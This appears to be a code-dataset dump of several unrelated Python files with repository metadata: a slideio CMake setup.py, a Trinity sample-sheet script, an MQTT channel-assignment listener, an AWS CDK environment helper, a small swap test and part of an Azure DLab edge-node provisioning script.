trainer_backend.DDPTrainerBackend(tr) if config["dist"] else tr tmArgs = trainer.TrainerArguments( **config["tmgr"], stats_args=trainer.stats.StatInitArguments(**config["stat"]), writer_args=trainer.WriterInitArguments(**config["wrt"]), checkpointer_args=trainer.DefaultCheckpointerArguments(**config["chkp"]), ) if config["dist"]: tr = trainer_backend.DDPTrainerBackend(tr) else: tmArgs.distributed_training_args = trainer.DistributedTrainingArguments( local_rank=config["cuda"] ) trainer = trainer.Trainer(trainer_backend=tr, module=tm, args=tmArgs) trainer.validate()
5,156
1,006
89
31e188b24e477c5a5d5c14f9c92fc0e596b84bcc
6,565
py
Python
src/pybind/setup.py
Booritas/slideio
fdee97747cc73f087a5538aef6a0315ec75becca
[ "BSD-3-Clause" ]
6
2021-01-25T15:21:31.000Z
2022-03-07T09:23:37.000Z
src/pybind/setup.py
Booritas/slideio
fdee97747cc73f087a5538aef6a0315ec75becca
[ "BSD-3-Clause" ]
3
2020-12-30T16:21:42.000Z
2022-03-07T09:23:18.000Z
src/pybind/setup.py
Booritas/slideio
fdee97747cc73f087a5538aef6a0315ec75becca
[ "BSD-3-Clause" ]
null
null
null
import os import re import sys import platform import subprocess import fnmatch import shutil from setuptools import setup, Extension, find_packages from setuptools.command.build_ext import build_ext import setuptools.command.build_py from distutils.version import LooseVersion from ctypes.util import find_library version = '0.5.' vrs_sub = '0' if os.environ.get('CI_PIPELINE_IID'): ci_id = os.environ['CI_PIPELINE_IID'] if (isinstance(ci_id, str) and len(ci_id)>0) or isinstance(ci_id, int): vrs_sub = ci_id version = version + vrs_sub source_dir= os.path.abspath('../../') build_dir= os.path.abspath('../../build_py') PLATFORM = get_platform() REDISTR_LIBS = [] if PLATFORM=='Windows': REDISTR_LIBS = [ 'concrt140.dll', 'msvcp140.dll', 'msvcp140_1.dll', 'msvcp140_2.dll', 'msvcp140_codecvt_ids.dll', 'vccorlib140.dll', 'vcruntime140.dll', 'vcruntime140_1.dll'] # Get the long description from the README file here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, 'README.md'), encoding='utf-8') as f: long_description = f.read() # Get requirements from requirements-dev.txt file with open(os.path.join(here, 'requirements-dev.txt')) as f: requirements_dev = f.read().replace('==', '>=').splitlines() setup( name='slideio', version=version, author='Stanislav Melnikov, Vadim Popov', author_email='stanislav.melnikov@gmail.com', description='Reading of medical images', long_description=long_description, ext_modules=[CMakeExtension(name = 'slideio', source_dir=source_dir, build_dir=build_dir)], cmdclass=dict(build_ext=CMakeBuild), packages=find_packages(), project_urls={ 'Documentation':'http://slideio.com', "Source Code": "https://gitlab.com/bioslide/slideio.git" }, keywords = 'images, pathology, tissue, medical, czi, svs, afi, scn', package_data={}, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Topic :: Scientific/Engineering', 'Topic :: Scientific/Engineering :: 
Bio-Informatics', 'Topic :: Scientific/Engineering :: Image Recognition', 'Topic :: Scientific/Engineering :: Medical Science Apps.', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', ], install_requires=['numpy'], extras_require={}, data_files=[( '.', [ 'requirements-dev.txt' ] )], zip_safe=False, )
32.181373
95
0.585986
import os import re import sys import platform import subprocess import fnmatch import shutil from setuptools import setup, Extension, find_packages from setuptools.command.build_ext import build_ext import setuptools.command.build_py from distutils.version import LooseVersion from ctypes.util import find_library version = '0.5.' vrs_sub = '0' if os.environ.get('CI_PIPELINE_IID'): ci_id = os.environ['CI_PIPELINE_IID'] if (isinstance(ci_id, str) and len(ci_id)>0) or isinstance(ci_id, int): vrs_sub = ci_id version = version + vrs_sub source_dir= os.path.abspath('../../') build_dir= os.path.abspath('../../build_py') def get_platform(): platforms = { 'linux' : 'Linux', 'linux1' : 'Linux', 'linux2' : 'Linux', 'darwin' : 'Macos', 'win32' : 'Windows' } if sys.platform not in platforms: return sys.platform return platforms[sys.platform] PLATFORM = get_platform() REDISTR_LIBS = [] if PLATFORM=='Windows': REDISTR_LIBS = [ 'concrt140.dll', 'msvcp140.dll', 'msvcp140_1.dll', 'msvcp140_2.dll', 'msvcp140_codecvt_ids.dll', 'vccorlib140.dll', 'vcruntime140.dll', 'vcruntime140_1.dll'] def find_shared_libs(dir, pattern): matches = [] for root, dirnames, filenames in os.walk(dir): for filename in fnmatch.filter(filenames, pattern): matches.append(os.path.join(root, filename)) return matches # Get the long description from the README file here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, 'README.md'), encoding='utf-8') as f: long_description = f.read() # Get requirements from requirements-dev.txt file with open(os.path.join(here, 'requirements-dev.txt')) as f: requirements_dev = f.read().replace('==', '>=').splitlines() class CMakeExtension(Extension): def __init__(self, name, source_dir='', build_dir=None): Extension.__init__(self, name, sources=[]) self.source_dir = os.path.abspath(source_dir) self.build_dir = os.path.abspath(build_dir) class CMakeBuild(build_ext): def run(self): try: out = subprocess.check_output(['cmake', '--version']) except OSError: 
raise RuntimeError( "CMake must be installed to build the following extensions: " + ", ".join(e.name for e in self.extensions) ) if platform.system() == "Windows": cmake_version = LooseVersion( re.search(r'version\s*([\d.]+)', out.decode()).group(1) ) if cmake_version < '3.1.0': raise RuntimeError("CMake >= 3.1.0 is required on Windows") for ext in self.extensions: self.build_extension(ext) def build_extension(self, ext): if not (ext.build_dir is None): self.build_temp = ext.build_dir extdir = os.path.abspath(os.path.dirname( self.get_ext_fullpath(ext.name))) cmake_args = [ '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir, '-DPYTHON_EXECUTABLE=' + sys.executable ] cfg = 'Debug' if self.debug else 'Release' build_args = ['--config', cfg] if platform.system() == "Windows": cmake_args += [ '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format( cfg.upper(), extdir ) ] if sys.maxsize > 2**32: cmake_args += ['-A', 'x64'] build_args += ['--', '/m'] else: cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg] build_args += ['--', '-j2'] env = os.environ.copy() env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format( env.get('CXXFLAGS', ''), self.distribution.get_version() ) if not os.path.exists(self.build_temp): os.makedirs(self.build_temp) subprocess.check_call( ['cmake', ext.source_dir] + cmake_args, cwd=self.build_temp, env=env ) subprocess.check_call( ['cmake', '--build', '.'] + build_args, cwd=self.build_temp ) patterns = ["*.so"] if PLATFORM == "Windows": patterns = ["*.dll"] elif PLATFORM == "Macos": patterns = ["*.so", "*.dylib"] print("----Look for shared libraries int directory", self.build_temp) extra_files = [] for pattern in patterns: files = find_shared_libs(self.build_temp, pattern) if len(files)>0: extra_files.extend(files) print("----Found libraries:", extra_files) if not os.path.exists(extdir): os.makedirs(extdir) for fl in extra_files: file_name = os.path.basename(fl) destination = os.path.join(extdir, file_name) print("Copy",fl,"->",destination) shutil.copyfile(fl, 
destination) for lib in REDISTR_LIBS: shutil.copy(find_library(lib), extdir) setup( name='slideio', version=version, author='Stanislav Melnikov, Vadim Popov', author_email='stanislav.melnikov@gmail.com', description='Reading of medical images', long_description=long_description, ext_modules=[CMakeExtension(name = 'slideio', source_dir=source_dir, build_dir=build_dir)], cmdclass=dict(build_ext=CMakeBuild), packages=find_packages(), project_urls={ 'Documentation':'http://slideio.com', "Source Code": "https://gitlab.com/bioslide/slideio.git" }, keywords = 'images, pathology, tissue, medical, czi, svs, afi, scn', package_data={}, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Topic :: Scientific/Engineering', 'Topic :: Scientific/Engineering :: Bio-Informatics', 'Topic :: Scientific/Engineering :: Image Recognition', 'Topic :: Scientific/Engineering :: Medical Science Apps.', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', ], install_requires=['numpy'], extras_require={}, data_files=[( '.', [ 'requirements-dev.txt' ] )], zip_safe=False, )
3,599
18
171
a02429054cb0cf7b20e8267bcc65eb77f6e899a8
1,064
py
Python
workflow/scripts/prep_trinity.py
matinnuhamunada/rnaseq_kadal
4e915866b460206ac499c3022b853aa1dcc65b51
[ "MIT" ]
null
null
null
workflow/scripts/prep_trinity.py
matinnuhamunada/rnaseq_kadal
4e915866b460206ac499c3022b853aa1dcc65b51
[ "MIT" ]
2
2022-01-14T17:43:24.000Z
2022-01-21T11:33:44.000Z
workflow/scripts/prep_trinity.py
matinnuhamunada/rnaseq_kadal
4e915866b460206ac499c3022b853aa1dcc65b51
[ "MIT" ]
null
null
null
import pandas as pd from pathlib import Path import sys def get_trinity_samples(run_name, condition, outfile, samples_path="config/samples.tsv", units_path="config/units.tsv"): """ """ samples = ( pd.read_csv(samples_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) units = ( pd.read_csv(units_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) trinity = [] subset = samples[samples.loc[:, "Condition"] == condition] for s in subset.index: s_dict = {} s_dict["Condition"] = samples.loc[s, "Condition"] s_dict["Replicate"] = units.loc[s, "unit_name"] s_dict["F"] = units.loc[s, "fq1"] s_dict["R"] = units.loc[s, "fq2"] trinity.append(s_dict) df = pd.DataFrame(trinity) df.to_csv(f"{outfile}", sep="\t", index=False, header=False) return None if __name__ == "__main__": get_trinity_samples(sys.argv[1], sys.argv[2], sys.argv[3])
29.555556
120
0.577068
import pandas as pd from pathlib import Path import sys def get_trinity_samples(run_name, condition, outfile, samples_path="config/samples.tsv", units_path="config/units.tsv"): """ """ samples = ( pd.read_csv(samples_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) units = ( pd.read_csv(units_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) trinity = [] subset = samples[samples.loc[:, "Condition"] == condition] for s in subset.index: s_dict = {} s_dict["Condition"] = samples.loc[s, "Condition"] s_dict["Replicate"] = units.loc[s, "unit_name"] s_dict["F"] = units.loc[s, "fq1"] s_dict["R"] = units.loc[s, "fq2"] trinity.append(s_dict) df = pd.DataFrame(trinity) df.to_csv(f"{outfile}", sep="\t", index=False, header=False) return None if __name__ == "__main__": get_trinity_samples(sys.argv[1], sys.argv[2], sys.argv[3])
0
0
0
066d4d4b7e35674f6bd507d4b6745a2269a00cea
2,779
py
Python
interfaces/srvr_tools/c_assign.py
krattai/AEBL
a7b12c97479e1236d5370166b15ca9f29d7d4265
[ "BSD-2-Clause" ]
4
2016-04-26T03:43:54.000Z
2016-11-17T08:09:04.000Z
interfaces/srvr_tools/c_assign.py
krattai/AEBL
a7b12c97479e1236d5370166b15ca9f29d7d4265
[ "BSD-2-Clause" ]
17
2015-01-05T21:06:22.000Z
2015-12-07T20:45:44.000Z
interfaces/srvr_tools/c_assign.py
krattai/AEBL
a7b12c97479e1236d5370166b15ca9f29d7d4265
[ "BSD-2-Clause" ]
3
2016-04-26T03:43:55.000Z
2020-11-06T11:02:08.000Z
#!/usr/bin/env python # Copyright (C) 2016 Uvea I. S., Kevin Rattai # # Watch for channel request and assign channel based on prior or unassigned chan # # This software is based on an unknown license, but is available # with no license statement from here: # http://stackoverflow.com/questions/31775450/publish-and-subscribe-with-paho-mqtt-client # # All changes will be under BSD 2 clause license. Code of unknown license # will be removed and replaced with code that will be BSD 2 clause # # Portions of this code is based on the noo-ebs project: # https://github.com/krattai/noo-ebs # # And portions of this code is based on the AEBL project: # https://github.com/krattai/AEBL # import os import paho.mqtt.client as mqtt # reference to MQTT python found here: http://mosquitto.org/documentation/python/ # requires: sudo pip install paho-mqtt # pip requires: sudo apt-get install python-pip message = 'ON' # mqttc.publish("response/" + str(msg.payload),msg.payload); # if 'ACK' in message: # mqttc.publish("alive/chan","NAK"); # if 'TEST' in message: # os.system("/home/user/scripts/test.sh") # mqttc.publish("test/output","NAK"); # mqttcb.publish("test/output",msg.payload); mqttc = mqtt.Client() # Assign event callbacks mqttc.on_message = on_message mqttc.on_connect = on_connect mqttc.on_publish = on_publish mqttc.on_subscribe = on_subscribe # Connect mqttc.connect("ihdn.ca", 1883,60) # mqttc.connect("2001:dead::beef:1", 1883,60) # mosquitto_sub -h 2001:dead::beef -t "hello/+" -t "ihdn/+" -t "test/+" # Continue the network loop mqttc.loop_forever()
29.88172
89
0.651673
#!/usr/bin/env python # Copyright (C) 2016 Uvea I. S., Kevin Rattai # # Watch for channel request and assign channel based on prior or unassigned chan # # This software is based on an unknown license, but is available # with no license statement from here: # http://stackoverflow.com/questions/31775450/publish-and-subscribe-with-paho-mqtt-client # # All changes will be under BSD 2 clause license. Code of unknown license # will be removed and replaced with code that will be BSD 2 clause # # Portions of this code is based on the noo-ebs project: # https://github.com/krattai/noo-ebs # # And portions of this code is based on the AEBL project: # https://github.com/krattai/AEBL # import os import paho.mqtt.client as mqtt # reference to MQTT python found here: http://mosquitto.org/documentation/python/ # requires: sudo pip install paho-mqtt # pip requires: sudo apt-get install python-pip message = 'ON' def on_connect(mosq, obj, rc): mqttc.subscribe("request/chan", 0) print("rc: " + str(rc)) def on_message(mosq, obj, msg): global message print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload)) message = msg.payload if os.path.isfile('chan/' + str(msg.payload)): # get channel from file fchan = open("chan/" + str(msg.payload)) chan = fchan.readline() chan = chan.rstrip('\n') fchan.close() else: # get next channel, create file and insert channel fchan = open("chan/.0chan","r+") chan = fchan.readline() chan = chan.rstrip('\n') nchan = int(chan) + 1 fchan.seek(0, 0) fchan.write(repr(nchan).zfill(6) + "\n") fchan.close() fchan = open("chan/" + str(msg.payload),"w+") fchan.write(chan + "\n") fchan.close() mqttc.publish("response/" + str(msg.payload),chan); # mqttc.publish("response/" + str(msg.payload),msg.payload); # if 'ACK' in message: # mqttc.publish("alive/chan","NAK"); # if 'TEST' in message: # os.system("/home/user/scripts/test.sh") # mqttc.publish("test/output","NAK"); # mqttcb.publish("test/output",msg.payload); def on_publish(mosq, obj, mid): print("mid: " + 
str(mid)) def on_subscribe(mosq, obj, mid, granted_qos): print("Subscribed: " + str(mid) + " " + str(granted_qos)) def on_log(mosq, obj, level, string): print(string) mqttc = mqtt.Client() # Assign event callbacks mqttc.on_message = on_message mqttc.on_connect = on_connect mqttc.on_publish = on_publish mqttc.on_subscribe = on_subscribe # Connect mqttc.connect("ihdn.ca", 1883,60) # mqttc.connect("2001:dead::beef:1", 1883,60) # mosquitto_sub -h 2001:dead::beef -t "hello/+" -t "ihdn/+" -t "test/+" # Continue the network loop mqttc.loop_forever()
1,050
0
114
4388231220b15bd9c8b6a792db56c557ffa340b3
2,948
py
Python
source/infrastructure/personalize/aws_lambda/functions/environment.py
turnoutnow/maintaining-personalized-experiences-with-machine-learning
b45588c094734cce70198811890a28e65b8e39e1
[ "Apache-2.0" ]
null
null
null
source/infrastructure/personalize/aws_lambda/functions/environment.py
turnoutnow/maintaining-personalized-experiences-with-machine-learning
b45588c094734cce70198811890a28e65b8e39e1
[ "Apache-2.0" ]
null
null
null
source/infrastructure/personalize/aws_lambda/functions/environment.py
turnoutnow/maintaining-personalized-experiences-with-machine-learning
b45588c094734cce70198811890a28e65b8e39e1
[ "Apache-2.0" ]
null
null
null
# ###################################################################################################################### # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # # with the License. You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software distributed under the License is distributed # # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for # # the specific language governing permissions and limitations under the License. # # ###################################################################################################################### from dataclasses import dataclass, field from aws_cdk.aws_lambda import IFunction from aws_cdk.core import Aws from aws_solutions.cdk.aws_lambda.environment_variable import EnvironmentVariable @dataclass class Environment: """ Tracks environment variables common to AWS Lambda functions deployed by this solution """ scope: IFunction solution_name: EnvironmentVariable = field(init=False, repr=False) solution_id: EnvironmentVariable = field(init=False, repr=False) solution_version: EnvironmentVariable = field(init=False, repr=False) log_level: EnvironmentVariable = field(init=False, repr=False) powertools_service_name: EnvironmentVariable = field(init=False, repr=False)
60.163265
120
0.542062
# ###################################################################################################################### # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # # with the License. You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software distributed under the License is distributed # # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for # # the specific language governing permissions and limitations under the License. # # ###################################################################################################################### from dataclasses import dataclass, field from aws_cdk.aws_lambda import IFunction from aws_cdk.core import Aws from aws_solutions.cdk.aws_lambda.environment_variable import EnvironmentVariable @dataclass class Environment: """ Tracks environment variables common to AWS Lambda functions deployed by this solution """ scope: IFunction solution_name: EnvironmentVariable = field(init=False, repr=False) solution_id: EnvironmentVariable = field(init=False, repr=False) solution_version: EnvironmentVariable = field(init=False, repr=False) log_level: EnvironmentVariable = field(init=False, repr=False) powertools_service_name: EnvironmentVariable = field(init=False, repr=False) def __post_init__(self): cloudwatch_namespace_id = f"personalize_solution_{Aws.STACK_NAME}" cloudwatch_service_id_default = f"Workflow" self.solution_name = EnvironmentVariable(self.scope, "SOLUTION_NAME") self.solution_id = EnvironmentVariable(self.scope, "SOLUTION_ID") self.solution_version = EnvironmentVariable(self.scope, "SOLUTION_VERSION") self.log_level = EnvironmentVariable(self.scope, "LOG_LEVEL", "INFO") self.powertools_service_name = 
EnvironmentVariable( self.scope, "POWERTOOLS_SERVICE_NAME", cloudwatch_service_id_default ) self.powertools_metrics_namespace = EnvironmentVariable( self.scope, "POWERTOOLS_METRICS_NAMESPACE", cloudwatch_namespace_id )
751
0
27
f4b84ddd46fdf014d7210c8b0802837e20498fe3
356
py
Python
8kyu/test_swap_values.py
adun/codewars.py
89e7d81e9ca05a432007d634892c1cba28f5b715
[ "MIT" ]
null
null
null
8kyu/test_swap_values.py
adun/codewars.py
89e7d81e9ca05a432007d634892c1cba28f5b715
[ "MIT" ]
null
null
null
8kyu/test_swap_values.py
adun/codewars.py
89e7d81e9ca05a432007d634892c1cba28f5b715
[ "MIT" ]
null
null
null
# I would like to be able to pass an array with two elements to my swapValues function # to swap the values. However it appears that the values aren't changing. # Can you figure out what's wrong here?
25.428571
86
0.676966
# I would like to be able to pass an array with two elements to my swapValues function # to swap the values. However it appears that the values aren't changing. # Can you figure out what's wrong here? def swap_values(args): args[0], args[1] = args[1], args[0] def test_swap_values(): arr = [1, 2] swap_values(arr) assert arr == [2, 1]
106
0
46
bcd43fdd32c531b45f4fbb862a550f3a2becbeff
20,304
py
Python
infrastructure-provisioning/src/general/scripts/azure/edge_configure.py
ofuks/DLab
460804a2559843d099936fe40373093f9bf9edcb
[ "Apache-2.0" ]
null
null
null
infrastructure-provisioning/src/general/scripts/azure/edge_configure.py
ofuks/DLab
460804a2559843d099936fe40373093f9bf9edcb
[ "Apache-2.0" ]
null
null
null
infrastructure-provisioning/src/general/scripts/azure/edge_configure.py
ofuks/DLab
460804a2559843d099936fe40373093f9bf9edcb
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # ***************************************************************************** # # Copyright (c) 2016, EPAM SYSTEMS INC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ****************************************************************************** import json from dlab.fab import * from dlab.meta_lib import * import sys, time, os from dlab.actions_lib import * if __name__ == "__main__": local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'], os.environ['request_id']) local_log_filepath = "/logs/edge/" + local_log_filename logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s', level=logging.DEBUG, filename=local_log_filepath) try: print('Generating infrastructure names and tags') edge_conf = dict() edge_conf['service_base_name'] = os.environ['conf_service_base_name'] edge_conf['resource_group_name'] = os.environ['azure_resource_group_name'] edge_conf['key_name'] = os.environ['conf_key_name'] edge_conf['vpc_name'] = os.environ['azure_vpc_name'] edge_conf['region'] = os.environ['azure_region'] edge_conf['subnet_name'] = os.environ['azure_subnet_name'] edge_conf['user_name'] = os.environ['edge_user_name'].replace('_', '-') edge_conf['user_keyname'] = os.environ['edge_user_name'] edge_conf['private_subnet_name'] = edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-subnet' edge_conf['instance_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge' 
edge_conf['network_interface_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-nif' edge_conf['static_public_ip_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-ip' edge_conf['primary_disk_name'] = edge_conf['instance_name'] + '-disk0' edge_conf['instance_dns_name'] = 'host-' + edge_conf['instance_name'] + '.' + edge_conf['region'] + '.cloudapp.azure.com' edge_conf['user_storage_account_name'] = edge_conf['service_base_name'] + '-' + edge_conf[ 'user_name'] + '-storage' edge_conf['user_container_name'] = (edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-container').lower() edge_conf['shared_storage_account_name'] = edge_conf['service_base_name'] + '-shared-storage' edge_conf['shared_container_name'] = (edge_conf['service_base_name'] + '-shared-container').lower() edge_conf['datalake_store_name'] = edge_conf['service_base_name'] + '-ssn-datalake' edge_conf['datalake_shared_directory_name'] = edge_conf['service_base_name'] + '-shared-folder' edge_conf['datalake_user_directory_name'] = '{0}-{1}-folder'.format(edge_conf['service_base_name'], edge_conf['user_name']) edge_conf['edge_security_group_name'] = edge_conf['instance_name'] + '-sg' edge_conf['notebook_security_group_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + \ '-nb-sg' edge_conf['master_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-master-sg' edge_conf['slave_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-slave-sg' edge_conf['dlab_ssh_user'] = os.environ['conf_os_user'] keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], edge_conf['key_name']) edge_conf['private_subnet_cidr'] = AzureMeta().get_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']).address_prefix edge_conf['edge_public_ip'] = 
AzureMeta().get_instance_public_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) edge_conf['edge_private_ip'] = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) instance_hostname = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) except Exception as err: append_result("Failed to generate infrastructure names", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: if os.environ['conf_os_family'] == 'debian': initial_user = 'ubuntu' sudo_group = 'sudo' if os.environ['conf_os_family'] == 'redhat': initial_user = 'ec2-user' sudo_group = 'wheel' logging.info('[CREATING DLAB SSH USER]') print('[CREATING DLAB SSH USER]') params = "--hostname {} --keyfile {} --initial_user {} --os_user {} 
--sudo_group {}".format\ (instance_hostname, os.environ['conf_key_dir'] + os.environ['conf_key_name'] + ".pem", initial_user, edge_conf['dlab_ssh_user'], sudo_group) try: local("~/scripts/{}.py {}".format('create_ssh_user', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed creating ssh user 'dlab'.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING PREREQUISITES]') logging.info('[INSTALLING PREREQUISITES]') params = "--hostname {} --keyfile {} --user {} --region {}".\ format(instance_hostname, keyfile_name, edge_conf['dlab_ssh_user'], os.environ['azure_region']) try: local("~/scripts/{}.py {}".format('install_prerequisites', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed 
installing apps: apt & pip.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING HTTP PROXY]') logging.info('[INSTALLING HTTP PROXY]') additional_config = {"exploratory_subnet": edge_conf['private_subnet_cidr'], "template_file": "/root/templates/squid.conf"} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}" \ .format(instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('configure_http_proxy', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing http proxy.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], 
edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING USERs KEY]') logging.info('[INSTALLING USERs KEY]') additional_config = {"user_keyname": edge_conf['user_keyname'], "user_keydir": os.environ['conf_key_dir']} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format( instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('install_user_key', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing users key. 
